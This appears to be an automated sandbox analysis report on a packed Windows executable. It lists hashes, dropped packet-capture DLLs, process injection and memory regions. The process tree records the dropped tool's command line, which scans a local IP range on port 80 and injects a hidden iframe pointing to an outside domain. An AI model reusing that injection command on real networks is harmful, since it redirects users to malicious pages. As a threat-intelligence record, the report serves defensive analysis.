8189d57bc73d30651e0ce19d2dc49c1c24ca31fc8c3ffd20ae4c80a719f7dbe2

Analysis

max time kernel
74s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
19-09-2022 00:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8189d57bc73d30651e0ce19d2dc49c1c24ca31fc8c3ffd20ae4c80a719f7dbe2.exe
Size

276KB
MD5

e3e3eb9e00745537a17311a48ddcfd6d
SHA1

19058766f647da781aadc49a5b67fe8f26cdb909
SHA256

8189d57bc73d30651e0ce19d2dc49c1c24ca31fc8c3ffd20ae4c80a719f7dbe2
SHA512

b2fe855346b0f5e5b3ffbb95b3070505772b22f4775d25c2b3e7ba73d1c6df4c3af3ce2726befbcf98e6886432e248d86342d010fc05fb7a1e8167c501080b03
SSDEEP

3072:ahyzLlm9zP96QoR6l1ESCqyp2Vdwrw5RPtGyfxtoeGAv/yOItvjUJNsdMRIApG5E:ahy0zPv+bed1GyfxB85WO0esgTaP

Score

8^/10

aspackv2

Malware Config

Signatures

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x0001000000022e0a-133.dat	aspack_v212_v242
behavioral2/files/0x0001000000022e0a-134.dat	aspack_v212_v242

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\drivers\D6BD.tmp	8189d57bc73d30651e0ce19d2dc49c1c24ca31fc8c3ffd20ae4c80a719f7dbe2.exe

Executes dropped EXE 1 IoCs

pid	Process
3916	D72C.tmp

Loads dropped DLL 6 IoCs

pid	Process
3916	D72C.tmp
3916	D72C.tmp
3916	D72C.tmp
3916	D72C.tmp
3916	D72C.tmp
3916	D72C.tmp

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\npptools.dll	8189d57bc73d30651e0ce19d2dc49c1c24ca31fc8c3ffd20ae4c80a719f7dbe2.exe
File opened for modification	C:\Windows\wpcap.dll	8189d57bc73d30651e0ce19d2dc49c1c24ca31fc8c3ffd20ae4c80a719f7dbe2.exe
File opened for modification	C:\Windows\WanPacket.dll	8189d57bc73d30651e0ce19d2dc49c1c24ca31fc8c3ffd20ae4c80a719f7dbe2.exe
File opened for modification	C:\Windows\Packet.dll	8189d57bc73d30651e0ce19d2dc49c1c24ca31fc8c3ffd20ae4c80a719f7dbe2.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1284 wrote to memory of 3916	1284	8189d57bc73d30651e0ce19d2dc49c1c24ca31fc8c3ffd20ae4c80a719f7dbe2.exe	84
PID 1284 wrote to memory of 3916	1284	8189d57bc73d30651e0ce19d2dc49c1c24ca31fc8c3ffd20ae4c80a719f7dbe2.exe	84
PID 1284 wrote to memory of 3916	1284	8189d57bc73d30651e0ce19d2dc49c1c24ca31fc8c3ffd20ae4c80a719f7dbe2.exe	84

C:\Users\Admin\AppData\Local\Temp\8189d57bc73d30651e0ce19d2dc49c1c24ca31fc8c3ffd20ae4c80a719f7dbe2.exe
"C:\Users\Admin\AppData\Local\Temp\8189d57bc73d30651e0ce19d2dc49c1c24ca31fc8c3ffd20ae4c80a719f7dbe2.exe"
1⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1284
- C:\Users\Admin\AppData\Local\Temp\D72C.tmp
  -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<iframe src="http://www.158dm.cn/index.htm" width=0 height=0 frameborder=0></iframe>"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3916

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\D72C.tmp

Filesize
20KB

MD5
1f1f73ea53fee2470603c7fa21767b92

SHA1
04cb20e91195126351fdd8ec472e663bfed5b452

SHA256
ad94f21f7e92f79de33dd73cd3ff0f14cc840394b5abf4d6bae449766e4c627f

SHA512
92ec775dc27a52e32bed6c26a4ba92f3fbeaa174964cdb370e7eec70e68a14a012d8ecafed19f572c241575e8381ab658c2bfc588704d39af7d1c7644cda25f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\D72C.tmp

Filesize
20KB

MD5
1f1f73ea53fee2470603c7fa21767b92

SHA1
04cb20e91195126351fdd8ec472e663bfed5b452

SHA256
ad94f21f7e92f79de33dd73cd3ff0f14cc840394b5abf4d6bae449766e4c627f

SHA512
92ec775dc27a52e32bed6c26a4ba92f3fbeaa174964cdb370e7eec70e68a14a012d8ecafed19f572c241575e8381ab658c2bfc588704d39af7d1c7644cda25f5

Download Submit
C:\Windows\NPPTOOLS.DLL

Filesize
27KB

MD5
fa95d1ea9290482f28ca739461034842

SHA1
d4293c6facb8201bb3417f944ab349a0330682fe

SHA256
3c2f244945ad836c0aa0e33ee88dfc88245b4570f4fcf49fe7df6ceb50fb56f9

SHA512
e88af525e40780e362ef91f2c221cf144601c96f81ce3f260bd8795e2887ff12eaf6d7b712a303dda0de72b0451185277b4dadfd1dbb894125b2d69108ff2519

Download Submit
C:\Windows\PACKET.DLL

Filesize
35KB

MD5
ce1251a841a24f0359e0e8cbfa25c68c

SHA1
76a2ab273492d5edc2dd3ed0d57378b018115c7d

SHA256
c21a2ffb90b461004ad5a4d44e7169e645f064f6038c3feb8ec67b0152660e99

SHA512
4a3e450e0b543bca1646d51b1be84b90de27fec8a0c9a6a1ad069ecdb5651a9d0926786a30d72bd50dfdd2faf092efc4ab132eef72fac3fc7d634420b18f9647

Download Submit
C:\Windows\Packet.dll

Filesize
35KB

MD5
ce1251a841a24f0359e0e8cbfa25c68c

SHA1
76a2ab273492d5edc2dd3ed0d57378b018115c7d

SHA256
c21a2ffb90b461004ad5a4d44e7169e645f064f6038c3feb8ec67b0152660e99

SHA512
4a3e450e0b543bca1646d51b1be84b90de27fec8a0c9a6a1ad069ecdb5651a9d0926786a30d72bd50dfdd2faf092efc4ab132eef72fac3fc7d634420b18f9647

Download Submit
C:\Windows\Packet.dll

Filesize
35KB

MD5
ce1251a841a24f0359e0e8cbfa25c68c

SHA1
76a2ab273492d5edc2dd3ed0d57378b018115c7d

SHA256
c21a2ffb90b461004ad5a4d44e7169e645f064f6038c3feb8ec67b0152660e99

SHA512
4a3e450e0b543bca1646d51b1be84b90de27fec8a0c9a6a1ad069ecdb5651a9d0926786a30d72bd50dfdd2faf092efc4ab132eef72fac3fc7d634420b18f9647

Download Submit
C:\Windows\WANPACKET.DLL

Filesize
29KB

MD5
7ba91d85248c8a404418d58303ffe993

SHA1
c19f9ba21cb5dc1c0dc6425902ffe7979961a48c

SHA256
2e9e1e5ee17638eebf065fd7a4d6db88cde2a3921f6bc67090934125ac21953e

SHA512
016f19a619aec6e15d5e985793c7fd02bde0352ce76f13d153a9479778221ab71178beb330b2ba17a370328099cabff57240dbce64feeddab98f49f691153b31

Download Submit
C:\Windows\WanPacket.dll

Filesize
29KB

MD5
7ba91d85248c8a404418d58303ffe993

SHA1
c19f9ba21cb5dc1c0dc6425902ffe7979961a48c

SHA256
2e9e1e5ee17638eebf065fd7a4d6db88cde2a3921f6bc67090934125ac21953e

SHA512
016f19a619aec6e15d5e985793c7fd02bde0352ce76f13d153a9479778221ab71178beb330b2ba17a370328099cabff57240dbce64feeddab98f49f691153b31

Download Submit
C:\Windows\WanPacket.dll

Filesize
29KB

MD5
7ba91d85248c8a404418d58303ffe993

SHA1
c19f9ba21cb5dc1c0dc6425902ffe7979961a48c

SHA256
2e9e1e5ee17638eebf065fd7a4d6db88cde2a3921f6bc67090934125ac21953e

SHA512
016f19a619aec6e15d5e985793c7fd02bde0352ce76f13d153a9479778221ab71178beb330b2ba17a370328099cabff57240dbce64feeddab98f49f691153b31

Download Submit
C:\Windows\npptools.dll

Filesize
27KB

MD5
fa95d1ea9290482f28ca739461034842

SHA1
d4293c6facb8201bb3417f944ab349a0330682fe

SHA256
3c2f244945ad836c0aa0e33ee88dfc88245b4570f4fcf49fe7df6ceb50fb56f9

SHA512
e88af525e40780e362ef91f2c221cf144601c96f81ce3f260bd8795e2887ff12eaf6d7b712a303dda0de72b0451185277b4dadfd1dbb894125b2d69108ff2519

Download Submit
C:\Windows\wpcap.dll

Filesize
90KB

MD5
e5b9135ca3f0c335d1c2903df7c45622

SHA1
15b3edbcc6ecc94f010305e089319fecef8d6fc1

SHA256
cc5d8b4707198bf70d9691f15702d8ec68065a82d76bf50140c614d2aae41ae2

SHA512
a41ddf61c88aa90f85d6d10e154c0e3d00245a299b8c094c22ef9272e62a6d795212b0c45c3979c0c771237353e78a2a4418a18a0202b6f4028e5029d84c4872

Download Submit
C:\Windows\wpcap.dll

Filesize
90KB

MD5
e5b9135ca3f0c335d1c2903df7c45622

SHA1
15b3edbcc6ecc94f010305e089319fecef8d6fc1

SHA256
cc5d8b4707198bf70d9691f15702d8ec68065a82d76bf50140c614d2aae41ae2

SHA512
a41ddf61c88aa90f85d6d10e154c0e3d00245a299b8c094c22ef9272e62a6d795212b0c45c3979c0c771237353e78a2a4418a18a0202b6f4028e5029d84c4872

Download Submit
memory/3916-145-0x000000005A740000-0x000000005A75B000-memory.dmp

Filesize
108KB

Download
memory/3916-132-0x0000000000000000-mapping.dmp

Download
memory/3916-146-0x0000000000880000-0x0000000000898000-memory.dmp

Filesize
96KB

Download
memory/3916-147-0x0000000000450000-0x0000000000470000-memory.dmp

Filesize
128KB

Download
memory/3916-149-0x0000000010000000-0x0000000010059000-memory.dmp

Filesize
356KB

Download
memory/3916-148-0x0000000010000000-0x0000000010059000-memory.dmp

Filesize
356KB

Download
memory/3916-150-0x0000000010000000-0x0000000010059000-memory.dmp

Filesize
356KB

Download
memory/3916-151-0x0000000000450000-0x0000000000470000-memory.dmp

Filesize
128KB

Download
memory/3916-152-0x0000000000880000-0x0000000000898000-memory.dmp

Filesize
96KB

Download
memory/3916-153-0x000000005A740000-0x000000005A75B000-memory.dmp

Filesize
108KB

Download